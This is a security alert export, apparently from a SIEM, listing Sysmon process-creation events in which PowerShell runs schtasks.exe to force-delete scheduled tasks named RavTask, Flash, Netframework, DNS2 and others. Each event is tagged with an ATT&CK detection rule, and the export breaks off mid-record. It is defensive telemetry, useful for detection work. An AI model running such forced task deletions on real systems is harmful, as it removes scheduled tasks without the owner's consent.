""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.290943500Z"",""eventRecordID"":""3324"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.286\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00104eec2b00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.286"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00104eec2b00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.823",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.240 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010a9ea2b00} +ProcessId: 4732 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.244028000Z"",""eventRecordID"":""3323"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.240\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010a9ea2b00}\r\nProcessId: 4732\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:34.240"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010a9ea2b00}"",""processId"":""4732"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.717",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.211 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00101ae92b00} +ProcessId: 7824 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.225788000Z"",""eventRecordID"":""3322"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.211\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00101ae92b00}\r\nProcessId: 7824\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.211"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00101ae92b00}"",""processId"":""7824"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.660",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.186 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00108be72b00} +ProcessId: 6188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.190878000Z"",""eventRecordID"":""3321"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.186\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00108be72b00}\r\nProcessId: 6188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.186"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00108be72b00}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.641",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.144 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bce42b00} +ProcessId: 5076 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.161460500Z"",""eventRecordID"":""3320"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.144\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bce42b00}\r\nProcessId: 5076\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.144"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010bce42b00}"",""processId"":""5076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:20:04.641",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.119 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001022e22b00} +ProcessId: 336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.121702000Z"",""eventRecordID"":""3319"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.119\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001022e22b00}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.119"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001022e22b00}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.618",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.095 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00103ce02b00} +ProcessId: 5048 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 